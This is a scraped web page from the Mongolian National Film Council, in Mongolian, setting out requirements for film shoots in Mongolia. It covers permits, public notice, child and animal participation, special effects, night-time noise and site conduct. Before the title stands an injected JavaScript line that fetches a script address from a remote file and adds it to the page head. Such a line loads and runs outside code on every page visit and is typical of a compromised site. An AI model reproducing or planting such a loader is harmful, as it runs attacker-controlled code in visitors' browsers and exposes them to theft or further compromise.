;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Зураг авалт хийхэд тавигдах шаардлага - Mongolian National Film Council

Зураг авалт хийхэд тавигдах шаардлага

Зураг авалтЗураг авалт хийхэд тавигдах шаардлага

Монгол улсад кино зураг авалт хийх кино продюсер, кино компани нь кино зураг авалт хийх байршлыг хайх, аюулгүй байдлыг хангах, зайлшгүй шаардлагатай зөвшөөрөл, мэдээллийг авах зорилгоор  Монгол Улсын иргэн, хуулийн этгээдийг байршлын менежер болон хөдөлмөрийн аюулгүй байдал, эрүүл ахуйн хууль тогтоомж, дүрэм, журмыг хэрэгжүүлэхэд дэмжлэг үзүүлэх хөдөлмөрийн аюулгүй байдал, эрүүл ахуйн асуудал хариуцсан ажилтан ажиллуулна.

Нийтийн эзэмшлийн зам, талбай буюу дараах байршил, нөхцөлд зураг авалт хийхэд олон нийтийн мэдэгдэл гаргана:

  • нийтийн эзэмшлийн зам талбай, нийтийн зогсоол, явган хүний ​​замаар явган хүний ​​хөдөлгөөнийг хязгаарлах;
  • кино зураг авалт хийх зорилгоор явган хүний ​​зам, нийтийн эзэмшлийн зам дээгүүр утас, кабель татах;
  • явган хүний ​​замыг хааж, нийтийн эзэмшлийн зам талбай, нийтийн зогсоол дээр олон тооны хүмүүс, тээврийн хэрэгсэл, амьтан оролцуулах кино зураг авалт хийх, зорилгоор генератор, камерын зам, хөл ашиглах;
  • дуу чимээ, агаарын бохирдол үүсгэх зураг авалтын үйл ажиллагаа;
  • зураг авалтад талбайд 10 ба түүнээс дээш амьтан оролцуулах;
  • төрийн болон орон нутгийн өмчид нөлөөлөх бусад зураг авалтын үйл ажиллагаа;

Зурагт авалтыг хийх зөвшөөрлийг 48 цагаас доошгүй хугацааны өмнө холбогдох байгууллагаас авч, мэдэгдэл гаргана. Мэдэгдэл нь цахим шуудан, захидал, албан бичиг, зөвшөөрөгдсөн байршилд мэдээлэл хүргэх гэх мэт хэлбэртэй байж болох ба дараах мэдээллийг агуулсан байна:

Зөвшөөрөл эзэмшигчийн нэр, холбоо барих мэдээлэл (үүнд: кино компанийн нэр, байршлын менежер, зургийн дарга эсвэл олон нийтийн санал хүсэлтийг шийдвэрлэх эрх бүхий багийн бусад гишүүний нэр, холбоо барих мэдээлэл);

Зураг авалтын эхлэх, дуусах хугацаа (бэлтгэх, зураг авалт дуусгах цаг зэргийг багтаана).

Кино зураг авалтад оролцох бага насны хүүхдийг оролцуулах тохиолдолд эцэг, эх, асран хамгаалагчаас нь бичгээр зөвшөөрөл авч, Хүүхэд хамгааллын тухай хуулийн 91 дүгээр зүйд заасан шаардлагыг хангаж ажиллана.

Байгалийн амьтан барих, ашиглах бол Амьтны тухай хууль, мал, гэрийн тэжээмэл амьтан эзэмшигчийн зөвшөөрлийг авна. Амьтан, малд аюулгүй арга, технологи ашиглана.

Тусгай эффект буюу дараах техник, технологи, бодис ашиглахад эрх бүхий байгууллагаас нэмэлтээр зөвшөөрөл авсан байна:

галт зэвсэг, сум, тэсэрч дэлбэрэх бодис, шатамхай шингэн, шатаах хэрэгсэл ашиглах;

салют ашиглах;

Тусгай эффект, үзүүлбэр ашигласан тохиолдолд цагдаа, онцгой байдал, гал түймэртэй тэмцэх болон түргэн тусламжийн байгууллагатай хамтран ажиллана.

Зөвшөөрөл эзэмшигчийн төлөөлөл, байршлын менежер нь зураг авалтын талбайд байнга байж, дараах үйл ажиллагааг хэрэгжүүлэх, хяналт тавьж ажиллана:

  • кино зураг авалтын ажлын явцад аж ахуйн нэгж, оршин суугчид, байгууллагуудад саад учруулахгүй байх;
  • аюулгүй байдлыг хангах;
  • кино зураг авалтын явцад үүссэн хог хаягдлыг хог хаягдал цуглуулж тээвэрлэх эрх бүхий байгууллагад шилжүүлэх эсхүл тогтоосон тусгай цэгт хүлээлгэн өгөх;
  • хөдөлмөрийн аюулгүй байдал, эрүүл ахуйн хууль тогтоомж, дүрэм, журмыг мөрдөх, хөдөлмөрийн аюулгүй байдал, эрүүл ахуйн асуудал хариуцсан ажилтан ажиллуулах:
  • зураг авалт хийж дууссаны дараа зураг авалтын өмнөх байдалд оруулах;
  • зөвшөөрөлд тусгагдсан зураг авалт, нөхцөл байдалд өөрчлөлт орсон бол мэдэгдэх;
  • зураг авалтад оролцож байгаа хүнд холбогдох хууль тогтоомжийг мөрдөх шаардлага тавих;

Зураг авалт хийх явцад нийтийн эзэмшлийн талбай ашиглахдаа барилга руу нэвтрэхэд орц, гарцыг хаахгүй байх ба цахилгаан үүсгүүрийн машин, ажиллаж байгаа генератор бүхий баазыг орон сууцны барилгын урд байрлуулахгүй.

Зайлшгүй шаардлагатайгаас бусад тохиолдолд шөнийн цагаар буюу орон нутгийн цагаар 22 цагаас дараагийн өдрийн 06 цаг хүртэлх хугацаанд дуу, чимээ гаргахгүй байж, зураг авалтад ашиглах тээврийн хэрэгслийг орон сууцны хороололд нэвтрүүлэхгүй. Шөнийн цагаар шаардлагатай зураг авалт хийх тохиолдолд оршин суугчдын цонх руу гэрэл тусгахгүй байх, тусгасан тохиолдолд оршин суугчтай тохиролцсоны үндсэн гэрэл хаах арга хэмжээг авна.

Зураг авалтын үеэр цагдаагийн албан хаагчийн хяналтаас бусад тохиолдолд тээврийн хэрэгслийн хөдөлгөөнийг барьж, чиглэл өөрчлөхийг хориглоно.

Зураг авалтын багийн гишүүд, зогсоолын зохицуулагч ил харагдах байдлаар үнэмлэх зүүж, шаардлагатай ажилтнууд аюулгүй байдлын хувцас, хамгаалалтын хантааз өмсөнө.

Холбогдох байгууллагын зөвшөөрөлгүйгээр мод, ургамлыг тайрах, танах, гудамжны тэмдэг, гэрэл болон бусад байнгын байгууламжийг зөөх, өөрчлөхийг хориглоно.

Зөвшөөрөл хүсэхarrow-right